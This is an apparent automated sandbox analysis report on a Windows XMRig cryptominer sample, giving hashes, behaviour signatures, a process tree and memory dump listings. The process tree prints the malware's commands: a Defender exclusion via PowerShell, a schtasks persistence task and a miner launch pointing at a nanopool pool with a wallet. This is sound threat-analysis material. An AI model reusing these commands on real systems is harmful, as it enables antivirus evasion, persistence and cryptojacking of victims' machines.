Resubmissions

06/03/2024, 22:46

240306-2pzx2abc39 7

23/12/2022, 20:25

221223-y7mhwahb34 10

23/12/2022, 20:11

221223-yx8ncscc9x 10

23/12/2022, 20:03

221223-ys7v9sha97 10

Analysis

  • max time kernel
    93s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/12/2022, 20:03

General

  • Target

    896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe

  • Size

    2.1MB

  • MD5

    55a350a007f6943a7e09f4abfdfa6979

  • SHA1

    c94e84ddbb6f525cfa675791c7f2d9b36d28a3ef

  • SHA256

    896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80

  • SHA512

    707269690787a70980cfc2658592cef762503ce7228fdfa56f5d584552327d28e338cc877fb37b1414f451a9c05a05fe3e134bc0197563a266fd62ab539bdc16

  • SSDEEP

    49152:yMkkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3gg+cnIFPsxdgyg:yDkfRX4UTDennUI3gvcIlRz

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
    "C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3668
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1300
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
        3⤵
        • Creates scheduled task(s)
        PID:3644
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3368

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3368-163-0x00000146E5FD0000-0x00000146E5FF0000-memory.dmp

    Filesize

    128KB

  • memory/3368-162-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/3368-172-0x00000146E6060000-0x00000146E6080000-memory.dmp

    Filesize

    128KB

  • memory/3368-171-0x00000146E6080000-0x00000146E60A0000-memory.dmp

    Filesize

    128KB

  • memory/3368-170-0x00000146E6060000-0x00000146E6080000-memory.dmp

    Filesize

    128KB

  • memory/3368-169-0x00000146E6080000-0x00000146E60A0000-memory.dmp

    Filesize

    128KB

  • memory/3368-168-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/3368-165-0x00000146E6020000-0x00000146E6060000-memory.dmp

    Filesize

    256KB

  • memory/3368-164-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/3368-159-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/3368-161-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/3668-147-0x00000258FA3A0000-0x00000258FA3C2000-memory.dmp

    Filesize

    136KB

  • memory/3668-148-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

    Filesize

    10.8MB

  • memory/3668-149-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

    Filesize

    10.8MB

  • memory/4896-144-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

    Filesize

    10.8MB

  • memory/4896-143-0x00007FFE4A8F0000-0x00007FFE4AA3E000-memory.dmp

    Filesize

    1.3MB

  • memory/4896-151-0x0000000003330000-0x0000000003371000-memory.dmp

    Filesize

    260KB

  • memory/4896-157-0x00007FFE67A50000-0x00007FFE67ABB000-memory.dmp

    Filesize

    428KB

  • memory/4896-155-0x00007FFE4A730000-0x00007FFE4A765000-memory.dmp

    Filesize

    212KB

  • memory/4896-156-0x00000000200E0000-0x00000000201E2000-memory.dmp

    Filesize

    1.0MB

  • memory/4896-150-0x0000000000500000-0x0000000000786000-memory.dmp

    Filesize

    2.5MB

  • memory/4896-158-0x00007FFE653A0000-0x00007FFE653DB000-memory.dmp

    Filesize

    236KB

  • memory/4896-134-0x00007FFE67D20000-0x00007FFE67DBE000-memory.dmp

    Filesize

    632KB

  • memory/4896-145-0x00007FFE668D0000-0x00007FFE668F7000-memory.dmp

    Filesize

    156KB

  • memory/4896-152-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

    Filesize

    10.8MB

  • memory/4896-135-0x00007FFE63EF0000-0x00007FFE63F02000-memory.dmp

    Filesize

    72KB

  • memory/4896-133-0x00007FFE4B0A0000-0x00007FFE4B14A000-memory.dmp

    Filesize

    680KB

  • memory/4896-142-0x0000000000500000-0x0000000000786000-memory.dmp

    Filesize

    2.5MB

  • memory/4896-141-0x00007FFE67B50000-0x00007FFE67B7B000-memory.dmp

    Filesize

    172KB

  • memory/4896-166-0x0000000000500000-0x0000000000786000-memory.dmp

    Filesize

    2.5MB

  • memory/4896-167-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

    Filesize

    10.8MB

  • memory/4896-140-0x00007FFE49A00000-0x00007FFE4A4C1000-memory.dmp

    Filesize

    10.8MB

  • memory/4896-139-0x00007FFE67EF0000-0x00007FFE68091000-memory.dmp

    Filesize

    1.6MB

  • memory/4896-138-0x0000000003330000-0x0000000003371000-memory.dmp

    Filesize

    260KB

  • memory/4896-137-0x0000000000500000-0x0000000000786000-memory.dmp

    Filesize

    2.5MB

  • memory/4896-136-0x00007FFE4AA40000-0x00007FFE4AAFD000-memory.dmp

    Filesize

    756KB